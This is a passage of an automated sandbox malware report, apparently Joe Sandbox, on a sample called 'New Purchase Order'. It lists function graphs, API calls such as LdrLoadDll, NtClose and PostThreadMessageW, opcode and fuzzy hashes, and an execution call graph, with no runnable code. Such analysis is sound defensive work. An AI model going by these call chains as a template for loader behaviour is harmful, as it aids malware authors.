                                                          control_flow_graph 205 4db0cb8-4db0d4c DuplicateHandle 206 4db0d4e-4db0d54 205->206 207 4db0d55-4db0d72 205->207 206->207
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04DB0D3F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: a4eda203f42748da024404cc4e99cb36485f775a966ea109dee51d5f41662f2d
                                                          • Instruction ID: 7111800de04e88b99589adac6c30b40c745543450b59eede8cd29273441a8a23
                                                          • Opcode Fuzzy Hash: a4eda203f42748da024404cc4e99cb36485f775a966ea109dee51d5f41662f2d
                                                          • Instruction Fuzzy Hash: 1121E4B5900208DFDB10CF9AD484ADEFBF8FB48310F14802AE958A7350D374A944CFA1
                                                          Function 00D2E838 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 d2e838-d2e878 375 d2e880-d2e8ab GetModuleHandleW 374->375 376 d2e87a-d2e87d 374->376 377 d2e8b4-d2e8c8 375->377 378 d2e8ad-d2e8b3 375->378 376->375 378->377
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00D2E89E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 7c4b0e44a53a9d29a9ba745f80499fb26cbb04f358c0043646f7f52dcead8ec7
                                                          • Instruction ID: c13ba5d97bc22f7e63ea58cda0ff6158461da83113305193d1bad37d3eab6063
                                                          • Opcode Fuzzy Hash: 7c4b0e44a53a9d29a9ba745f80499fb26cbb04f358c0043646f7f52dcead8ec7
                                                          • Instruction Fuzzy Hash: B01110B5C007598FDB10CF9AD444BDEFBF4AB88314F14842AD859A7300D379A545CFA1
                                                          Function 00CCD3D8 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397383135.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ccd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e2d1084cbb5eb7f45dac9a57e43094503761b93e24914522b8dc1544ceb5451e
                                                          • Instruction ID: 1a2d3b32cf73a170632a2a6b50d8c9ad3b5d6c0e94d6fa3378ae8bb4f3b5e364
                                                          • Opcode Fuzzy Hash: e2d1084cbb5eb7f45dac9a57e43094503761b93e24914522b8dc1544ceb5451e
                                                          • Instruction Fuzzy Hash: 9321D3B1504344DFDB09DF10D9C0F26BB65FB98324F24C57DEA0A4B256C336E856CAA2
                                                          Function 00CDD01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397413468.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_cdd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed3f345e20ecefac45f6614ab7ea08e13d6232b6fa3aeabf57d27425ff7fe0a2
                                                          • Instruction ID: bca7fac4b3559f51cee796e78693b3f04b2c1cfb3e7605b6e68c7cf052481ec5
                                                          • Opcode Fuzzy Hash: ed3f345e20ecefac45f6614ab7ea08e13d6232b6fa3aeabf57d27425ff7fe0a2
                                                          • Instruction Fuzzy Hash: 0021F571904300DFDB14DF14D9C4B26BB65EBC8314F24C56EDA4A4B356C336E857CA62
                                                          Function 00CDD005 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397413468.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_cdd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 517bfe69e0f939def96d01bf941e71b38f20601a042dd8c4bd3c020e4a90688b
                                                          • Instruction ID: a190a602d1cbdd16ff205b963563e3193e83a12a2e044cd9ddb8372f767ef3b8
                                                          • Opcode Fuzzy Hash: 517bfe69e0f939def96d01bf941e71b38f20601a042dd8c4bd3c020e4a90688b
                                                          • Instruction Fuzzy Hash: F8218E755093808FCB12CF24D994715BF71EB86314F28C5EBD9498F6A7C33A980ACB62
                                                          Function 00CCD3D3 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397383135.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ccd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                          • Instruction ID: 28d7f7fd96de2cf8566eb5daee07238efbb91498774d35c50bc6810a4f49f597
                                                          • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                          • Instruction Fuzzy Hash: 01110372404240DFCB05CF00D9C4B16BF71FB94324F24C2ADD90A0B656C33AE95ACBA1
                                                          Function 00CCD731 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397383135.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ccd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c51ce2c7a773db880665d9e6f91400a8814342af94baf37d78b2765fff78901b
                                                          • Instruction ID: 3108d6cf26238119b7f9cccff2df943c1ba7274347e8a859d9cc58b994261273
                                                          • Opcode Fuzzy Hash: c51ce2c7a773db880665d9e6f91400a8814342af94baf37d78b2765fff78901b
                                                          • Instruction Fuzzy Hash: A101F7310083449BE7108A66CC84F66FBD8DF40320F14C47EED1A4A186C6789940C772
                                                          Function 00CCD730 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397383135.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ccd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cb984e15df66e30b125d19118293772d49b841d89d784b273d41a168d35218a
                                                          • Instruction ID: 5726dbf3ed58476ba19e333dc4d84a507fe2f27fd4e69425439701504970c256
                                                          • Opcode Fuzzy Hash: 1cb984e15df66e30b125d19118293772d49b841d89d784b273d41a168d35218a
                                                          • Instruction Fuzzy Hash: 50F0C2310043449FE7108A16CC84B62FBE8EB90334F18C46AED194F286C3789C84CB71

                                                          Non-executed Functions

                                                          Function 04DB9FAB Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: |s/@
                                                          • API String ID: 0-853176268
                                                          • Opcode ID: 2fd46758094c05388d7c1251e12810374e7765f7e4e8f3f99042f21a77bf2402
                                                          • Instruction ID: 192feef2d5d196461662d4d4b649fbf32fbbcb0a650d83451f750d84571155f1
                                                          • Opcode Fuzzy Hash: 2fd46758094c05388d7c1251e12810374e7765f7e4e8f3f99042f21a77bf2402
                                                          • Instruction Fuzzy Hash: 81C1B470B08790CFDB15CF68C5919AEFBF2AF86300B18895AD496DB365D634EC42CB91
                                                          Function 04DB3978 Relevance: .3, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7772319053bb078b6b1e0199dede7b9358046ae5ae25fae62f95f79658934092
                                                          • Instruction ID: b95a62600ec4bb2e0cf9ecd32789b72ef811060733460659d2ef92aaca3167a1
                                                          • Opcode Fuzzy Hash: 7772319053bb078b6b1e0199dede7b9358046ae5ae25fae62f95f79658934092
                                                          • Instruction Fuzzy Hash: EE1270B2401B898EE710CF66EDDC18A7BA1BB8531CF604609E2613E2F5DBB4155ECF44
                                                          Function 04DBE83F Relevance: .3, Instructions: 273COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9177aa720c402ce70998d8209d84d89e693fc24467d248919e1037115e3cad4
                                                          • Instruction ID: da1d596c4377ef9be1ebcb6dc5f523f2845ef4b5188f54c88bb8ea0e53a9cc62
                                                          • Opcode Fuzzy Hash: b9177aa720c402ce70998d8209d84d89e693fc24467d248919e1037115e3cad4
                                                          • Instruction Fuzzy Hash: 96D10531C2065ADACB01EBA4E994A99B7B1FFD5300F10C79AE04937610FB70AEC5CB91
                                                          Function 04DB1554 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b52ba207e4f1c355aee4a63eacaa7ee939284e03f9b81a20f2bb5c7448f33888
                                                          • Instruction ID: 9e47c3efb47e9917967aa798a6c4ab94a5afdbe88a3fd925b8304892c84267ef
                                                          • Opcode Fuzzy Hash: b52ba207e4f1c355aee4a63eacaa7ee939284e03f9b81a20f2bb5c7448f33888
                                                          • Instruction Fuzzy Hash: 41A16D36F00209CFCF05DFA5C8945EEB7B2FF84304B1585AAE846AB265DB31E955CB90
                                                          Function 04DBE850 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c8303677bfb29e3f668eb192fcf5d72c98a5547dd1c0e63c4ac3408190586f46
                                                          • Instruction ID: 2e79d909bcfa4412429268a1f7ebfeb463e04b333c190bb8a6b2335381bea432
                                                          • Opcode Fuzzy Hash: c8303677bfb29e3f668eb192fcf5d72c98a5547dd1c0e63c4ac3408190586f46
                                                          • Instruction Fuzzy Hash: ADD1F431C2065ADACB01EBA5E954A99B7B1FFD5300F10C79AE08937610FB70AEC5CB91
                                                          Function 04DB3968 Relevance: .2, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e245f0a217ccc12f4a9c0530518f229ccead75c1c32a97a43fb78e9e77a7656
                                                          • Instruction ID: f7593cc399028550ae10aef6a30236627748a6c479a9051a2ca73a013d20842d
                                                          • Opcode Fuzzy Hash: 5e245f0a217ccc12f4a9c0530518f229ccead75c1c32a97a43fb78e9e77a7656
                                                          • Instruction Fuzzy Hash: ACC1C4B2801B898ED710CF66EC9818ABBB1BB85718F654609E2617F2F1DBB4145ECF44
                                                          Function 00D22C20 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e6d204330fff66598ec867ca8c3a8f7a1c74da4a1a19d0435cde56e20bfebe7
                                                          • Instruction ID: c22f5a857bc2f70ecc3f2cf7b4f398b4d3e3ed99c1ad1384867c67e77265438d
                                                          • Opcode Fuzzy Hash: 8e6d204330fff66598ec867ca8c3a8f7a1c74da4a1a19d0435cde56e20bfebe7
                                                          • Instruction Fuzzy Hash: FC411531604211CFC714CF2ED881A6ABBF1FF95354B24C86AE0AADBA60D330E952DF55
                                                          Function 00D22C30 Relevance: .1, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 886a22f8b4b07d2e42e3594923c035012b938bf445f649cbfd1c267be712fd09
                                                          • Instruction ID: 6689031be8dffd691760c2eca5103931fa93b5ea92bb9a87770ab3534daf1d89
                                                          • Opcode Fuzzy Hash: 886a22f8b4b07d2e42e3594923c035012b938bf445f649cbfd1c267be712fd09
                                                          • Instruction Fuzzy Hash: D141F131604611CFC714CF2AE881A6BB7F2FF94314B24C82AE06ADBA20D230E951CF55

                                                          Execution Graph

                                                          Execution Coverage:1.2%
                                                          Dynamic/Decrypted Code Coverage:5.1%
                                                          Signature Coverage:8%
                                                          Total number of Nodes:138
                                                          Total number of Limit Nodes:11
                                                          execution_graph 95006 42fa63 95007 42fa73 95006->95007 95008 42fa79 95006->95008 95011 42eaa3 95008->95011 95010 42fa9f 95014 42cc63 95011->95014 95013 42eabb 95013->95010 95015 42cc7d 95014->95015 95016 42cc8b RtlAllocateHeap 95015->95016 95016->95013 95017 4250a3 95021 4250bc 95017->95021 95018 425149 95019 425104 95025 42e9c3 95019->95025 95021->95018 95021->95019 95023 425144 95021->95023 95024 42e9c3 RtlFreeHeap 95023->95024 95024->95018 95028 42cca3 95025->95028 95027 425114 95029 42ccbd 95028->95029 95030 42cccb RtlFreeHeap 95029->95030 95030->95027 95119 424d13 95120 424d2f 95119->95120 95121 424d57 95120->95121 95122 424d6b 95120->95122 95123 42c953 NtClose 95121->95123 95124 42c953 NtClose 95122->95124 95125 424d60 95123->95125 95126 424d74 95124->95126 95129 42eae3 RtlAllocateHeap 95126->95129 95128 424d7f 95129->95128 95130 42bfb3 95131 42bfcd 95130->95131 95134 1882df0 LdrInitializeThunk 95131->95134 95132 42bff2 95134->95132 95135 41b653 95136 41b697 95135->95136 95137 42c953 NtClose 95136->95137 95138 41b6b8 95136->95138 95137->95138 95139 41a8f3 95140 41a90b 95139->95140 95142 41a962 95139->95142 95140->95142 95143 41e833 95140->95143 95144 41e859 95143->95144 95148 41e94d 95144->95148 95149 42fb93 95144->95149 95146 41e8eb 95147 42c003 LdrInitializeThunk 95146->95147 95146->95148 95147->95148 95148->95142 95150 42fb03 95149->95150 95151 42eaa3 RtlAllocateHeap 95150->95151 95153 42fb60 95150->95153 95152 42fb3d 95151->95152 95154 42e9c3 RtlFreeHeap 95152->95154 95153->95146 95154->95153 95155 4143b3 95156 4143cd 95155->95156 95161 417b63 95156->95161 95158 4143e8 95159 41442d 95158->95159 95160 41441c PostThreadMessageW 95158->95160 95160->95159 95162 417b87 95161->95162 95163 417b8e 95162->95163 95164 417bca LdrLoadDll 95162->95164 95163->95158 95164->95163 95031 1882b60 LdrInitializeThunk 95165 4190f8 95166 42c953 NtClose 95165->95166 95167 419102 95166->95167 95032 40192a 95033 40192e 95032->95033 95034 40198b 95033->95034 95037 42ff33 95033->95037 95035 401a50 95035->95035 95040 42e573 95037->95040 95041 42e599 95040->95041 95052 407403 95041->95052 95043 42e5af 95051 42e60b 95043->95051 95055 41b463 95043->95055 95045 42e5ce 95046 42e5e3 95045->95046 95070 42cce3 95045->95070 95066 428563 95046->95066 95049 42e5fd 95050 42cce3 ExitProcess 95049->95050 95050->95051 95051->95035 95073 416823 95052->95073 95054 407410 95054->95043 95056 41b48f 95055->95056 95091 41b353 95056->95091 95059 41b4bc 95062 41b4c7 95059->95062 95097 42c953 95059->95097 95061 41b4d4 95063 42c953 NtClose 95061->95063 95064 41b4f0 95061->95064 95062->95045 95065 41b4e6 95063->95065 95064->95045 95065->95045 95067 4285c5 95066->95067 95069 4285d2 95067->95069 95105 4189c3 95067->95105 95069->95049 95071 42cd00 95070->95071 95072 42cd11 ExitProcess 95071->95072 95072->95046 95074 416840 95073->95074 95076 416853 95074->95076 95077 42d393 95074->95077 95076->95054 95079 42d3ad 95077->95079 95078 42d3dc 95078->95076 95079->95078 95084 42c003 95079->95084 95082 42e9c3 RtlFreeHeap 95083 42d452 95082->95083 95083->95076 95085 42c01d 95084->95085 95088 1882c0a 95085->95088 95086 42c046 95086->95082 95089 1882c1f LdrInitializeThunk 95088->95089 95090 1882c11 95088->95090 95089->95086 95090->95086 95092 41b449 95091->95092 95093 41b36d 95091->95093 95092->95059 95092->95061 95100 42c093 95093->95100 95096 42c953 NtClose 95096->95092 95098 42c96d 95097->95098 95099 42c97b NtClose 95098->95099 95099->95062 95101 42c0b0 95100->95101 95104 18835c0 LdrInitializeThunk 95101->95104 95102 41b43d 95102->95096 95104->95102 95107 4189ed 95105->95107 95106 418edb 95106->95069 95107->95106 95113 414033 95107->95113 95109 418b0e 95109->95106 95110 42e9c3 RtlFreeHeap 95109->95110 95111 418b26 95110->95111 95111->95106 95112 42cce3 ExitProcess 95111->95112 95112->95106 95117 414050 95113->95117 95115 4140ac 95115->95109 95116 4140b6 95116->95109 95117->95116 95118 41b773 RtlFreeHeap LdrInitializeThunk 95117->95118 95118->95115 95168 413ebc 95169 413e64 95168->95169 95171 413ed0 95168->95171 95173 42cbd3 95169->95173 95174 42cbed 95173->95174 95177 1882c70 LdrInitializeThunk 95174->95177 95175 413e75 95177->95175

                                                          Executed Functions

                                                          Function 00417B63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                          • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                          • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                          • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95
                                                          Function 0042C953 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                          • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                          • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                          • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
                                                          Function 01882B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 434d3c0db9fbf4623249e275d507b93e0b3cbc6a9612ad48f3094107b068ec5e
                                                          • Instruction ID: 1908b00db9d5d4fd3ad3224afb4c8bc0f812efac82faa4713dfbe71350f3dc3a
                                                          • Opcode Fuzzy Hash: 434d3c0db9fbf4623249e275d507b93e0b3cbc6a9612ad48f3094107b068ec5e
                                                          • Instruction Fuzzy Hash: 2F90026120240507460571584814616404A97E2301B59C021E201C590DC5298A95622A
                                                          Function 01882DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: fd43c6bfd0f2f9d0d91fc9e7a8c053321a2aec1bb0cc66bd86b505c7818ec769
                                                          • Instruction ID: a581ccd9e70747839cf649b5c4c99c91e9ef574978e69ef37a094f01283cd509
                                                          • Opcode Fuzzy Hash: fd43c6bfd0f2f9d0d91fc9e7a8c053321a2aec1bb0cc66bd86b505c7818ec769
                                                          • Instruction Fuzzy Hash: 9C90023120140917D61171584904707004997D2341F99C412A142C558DD65A8B56A226
                                                          Function 01882C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e808057d126ef376db30a776f62ea7ecce1e738f66b69b7f301f761ef08a4faf
                                                          • Instruction ID: 394a95df76f71c44690aac67918e8c790b683de5039016d51ab66fa2ca36269c
                                                          • Opcode Fuzzy Hash: e808057d126ef376db30a776f62ea7ecce1e738f66b69b7f301f761ef08a4faf
                                                          • Instruction Fuzzy Hash: C890023120148D06D6107158880474A004597D2301F5DC411A542C658DC6998A957226
                                                          Function 018835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2f3af74f546e7d7cea2d588d45c55d5ec990418cf857e9d8509b7506eea55c6d
                                                          • Instruction ID: f445bef1aed453a431e911ba1ae8c2525ba087827473b5989e9084df673f83d9
                                                          • Opcode Fuzzy Hash: 2f3af74f546e7d7cea2d588d45c55d5ec990418cf857e9d8509b7506eea55c6d
                                                          • Instruction Fuzzy Hash: 3990023160550906D60071584914706104597D2301F69C411A142C568DC7998B5566A7
                                                          Function 00414320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                          • Instruction ID: c654e7dd82306ad07be20f2182398129074d27dccdf197e7b8b500296daea260
                                                          • Opcode Fuzzy Hash: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                          • Instruction Fuzzy Hash: 6A21F972E4421C7EEB01AE959C82DEF7B7CEF40798B40816AF904A7241D6389E1687E5
                                                          Function 004143A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                          • Instruction ID: 934fb77fa0409c7874f7a2f8fe5ac0ceccbab11669475182c5f65d5113228a07
                                                          • Opcode Fuzzy Hash: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                          • Instruction Fuzzy Hash: 1D1108B1D4021C7AEB10ABE19CC1DEF7B7CDF41798F408069FA04B7200D6785E068BA5
                                                          Function 004143B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                          Strings
                                                          Memory Dump Source
